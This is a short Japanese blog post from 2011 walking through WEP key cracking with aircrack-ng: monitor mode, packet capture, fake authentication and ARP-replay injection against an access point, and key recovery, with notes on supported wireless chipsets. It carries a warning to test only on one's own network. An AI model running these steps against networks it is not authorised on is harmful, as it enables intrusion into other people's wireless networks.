2011/03/18

いまさらWEP解読

※注意※
絶対に自分の管理下でない環境では試さないでください。
必ず自分の管理下の環境で行うこと!

公式サイト
aircrack-ngのtutorialを読めば全てがわかる。
特に、newbie-guideは必読。
sudo(先頭につけると管理者権限で実行)
iwconfig eth1 mode monitor
iwconfigのeth1をモニターモードに変更
iwconfig
ステータス確認
ifconfig eth1 up
ifconfigのeth1をネットワークの有効にする
ifconfig
ステータス確認
または airmon-ng start eth1
tcpdump -i eth1
パケット採取確認
※[Ctrl]+[C] で停止
airodump-ng -w test eth1
パケット確保 オプション-wの次に保存したい名前(保存時は名前-01.capとなる)
aireplay -1 0 -e [ESSID] -a [BSSID] -h 0:1:2:3:4:5 ath0
APに偽の認証をする
aireplay-ng -3 -b 00:AA:00:AA:00:AA(相手のMACアドレス)-h 自分のMACアドレス eth1
IVパケット採取の効率を高める
aireplay-ng -b BSSID --interactive ath0
aircrack-ng test-01.cap
複合化
対応チップセット
Prism2, PrismGT (FullMAC), Atheros, RTL8180, RTL8187 and Ralink
CISCO AIRONET (AIR-CB21AG-J-K9) ※Atherosチップ
Atherosチップを採用している廉価(2000円)カードPLANEX GW-NS54CW
BUFFALO WLI-PCM-L11/GP (Orinocoチップ)
IO DATAのWN-WAG/CB(AR5212)
Atherosチップ搭載のPCカード型で鉄板。NETGEARのWG511T
[Card]LD-WL54AG/CB(Atheros)
※上から順番に信用度
未対応チップセット
Centrino(ipw2200), Hermes, ACX1xx, Aironet, ZyDAS, Marvell and Broadcom
Centrino:Panasonic CF-T4内蔵無線(Intel)
古いヴァージョンだと使える??
#これならいけた!!(Panasonic CF-T4にBackTrackを使用)#
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
iwconfig eth1 ap
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
ifconfig eth1 up
ifconfig rtap0 up
aircrack-ngインストール
tar -zxvf aircrack-ng-0.9.tar.gz
cd aircrack-ng-0.9
make
make install
airodump-ng --channel --bssid -w dumpfile rtap0
--channelは-c --bssidは-bに短縮できる
aireplay-ng --arpreplay -b -h -i rtap0 eth1
(client MAC addrは実際に使えてるPCのMACアドレス)
aircrack-ng -z /root/aircrack-ng-0.9/test-01.cap
#ここまで#
※BackTrackは約550MBの制限がある。
airodumpで700万VIs近くをgetするとMAX(550MB)に達する。
aireplayでアタックできてる状態でairodumpを止めてtest-01.capファイルを削除した後にairodumpを再度実行する。
aireplayでアタックがうまくいかないことがある。それは時間や距離の問題ではなく他のPCからアクセスポイントにデータのやり取りがあればうまくいく。
参考URL
英語
上記の日本語訳(機械)
たくさん参考にしすぎて結構忘れてる・・・